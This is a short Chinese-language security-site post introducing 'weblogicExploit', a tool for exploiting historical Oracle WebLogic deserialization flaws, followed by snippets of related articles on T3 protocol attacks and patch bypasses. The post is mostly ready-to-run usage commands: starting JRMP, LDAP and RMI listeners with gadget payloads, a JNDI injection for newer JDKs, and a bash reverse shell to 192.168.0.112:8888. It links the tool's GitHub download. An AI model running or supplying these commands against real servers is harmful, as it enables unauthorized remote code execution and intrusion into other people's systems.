weblogic历史漏洞利用工具 -- weblogicExploit

VSole2022-11-29 10:55:26

一、工具介绍

工具部分代码借鉴前辈的weblogic_cmd,属于二次再造轮子,部分功能暂未完善,后续将继续往上加功能。

二、安装与使用

1、列出可控payloads

java -jar weblogic.jar -payloads

2、启动JRMPListener

java -jar weblogic.jar -Jport 8888 -payload cc6 -c calc.exe

3、启动LDAP/RMI

LDAP
java -jar weblogic.jar -jndistart -Jport 8888 -jndildap -codeurl http://127.0.0.1/#wlc618
RMI
java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/

4、高版本jndi注入 ldap

java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'open /System/Applications/Calculator.app'
java -jar weblogic\ tools.jar -jndistart -Jport 9922 -jndildap -highjdk -os linux -c 'bash -i >& /dev/tcp/192.168.0.112/8888 0>&1'

三、下载地址:

https://github.com/8ypass/weblogicExploit

weblogic
本作品采用《CC 协议》,转载必须注明作者和本文链接
去年weblogic出白名单时研究了下怎么绕过,总结出了下面的思路,本想再找找有无新的攻击面的思路,但是找了几次都没找到,后来就搁置了。readMsgAbbrevs函数就会对流中的序列化数据进行反序列化,调用的是InboundMsgAbbrev类的readObject方法,并存储在栈中。这里也就是之前weblogic的漏洞会触发的readObject的地方。但是在21年4月的补丁中,Weblogic使用了白名单,只有以下七种类可以被反序列化,因此所有Weblogic原本的漏洞都无法使用。
验证环境weblogic/wsee/jaxws/WLSServletAdapter.class的handle方法打上断点访问http://127.0.0.1:7001/wls-wsat/CoordinatorPortType关于T3协议T3协议是Weblogic用于通信的独有的一个协议,Weblogic Server的RMI通信使用它在其他区的Java程序传输数据。T3协议的组成这里借一张图解释一下关于 T3协议的组成ac ed 00 05是反序列化标志,而在 T3 协议中每个序列化数据包前面都有fe 01 00 00,所以 T3 的序列化标志为fe 01 00 00 ac ed 00 05并且在发送T3协议的时候 还可以发送多个序列化数据 ,可以替换其中一个的序列化数据 实现反序列化攻击。
weblogic T3 attack&cve
2023-03-29 10:07:32
定义了固定的t3header和反序列化标志头fe010000。RFC1700规定使用“大端”字节序为网络字节序,所以对生成的payload使用>大端模式打包,I表示unsigned int。CVE-2016-0638复现需要打补丁,找不到懒得打了,简单说一下绕过,不写poc了黑名单列表为:+org.apache.c
java -jar weblogic.jar -jndistart -Jport 8888 -jndirmi -codeurl http://127.0.0.1/
通过common-collection相关gadget,想办法调用org.mozilla.classfile.DefiningClassLoader这个类去加载字节码。然后通过T3协议的反序列化漏洞发送给待攻击weblogic服务器。
后续经过扫描探测发现T3、IIOP协议同时关闭了,仅限HTTP访问。需要用户名密码,打补丁后,可以判断用户名密码是否存在,但是无法上传文件成功。
我记得大概是15年年底时,冰蝎作者rebeyond第一个公布出Weblogic T3反序列化回显方法,而且给出了相关的代码。早期的Weblogic反序列化利用工具,为了实现T3协议回显,都会向服务器上写入一个临时文件。
开始着手对Weblogic历史漏洞进行剖析,周末分析了Weblogic历史上的严重漏洞,一次针对CVE-2015-4852漏洞的补丁绕过。原理虽然简单,但是时间太过久远,一些关键点被历史的长河淹没。找了很多师傅们的博客文章,关于如何封装之前的利用链,大多是用的https://github.com/5up3rc/weblogic_cmd中的现有功能。打算从补丁分析、补丁绕过、利用构造三大方面开始分析
weblogic 漏洞扫描工具
2021-08-09 09:00:47
weblogic 漏洞扫描工具
漏洞概述 Oracle官方发布了10月份的安全补丁, 补丁中包含启明星辰ADLab发现并第一时间提交给官方的漏洞,漏洞编号为CVE-2020-14820。通过该漏洞,攻击者可以在未授权的情况下将payload封装在T3或IIOP协议中,通过对协议中的payload进行反序列化,从而实现对存在漏洞的WebLogic组件进行远程Blind XXE攻击。
VSole
网络安全专家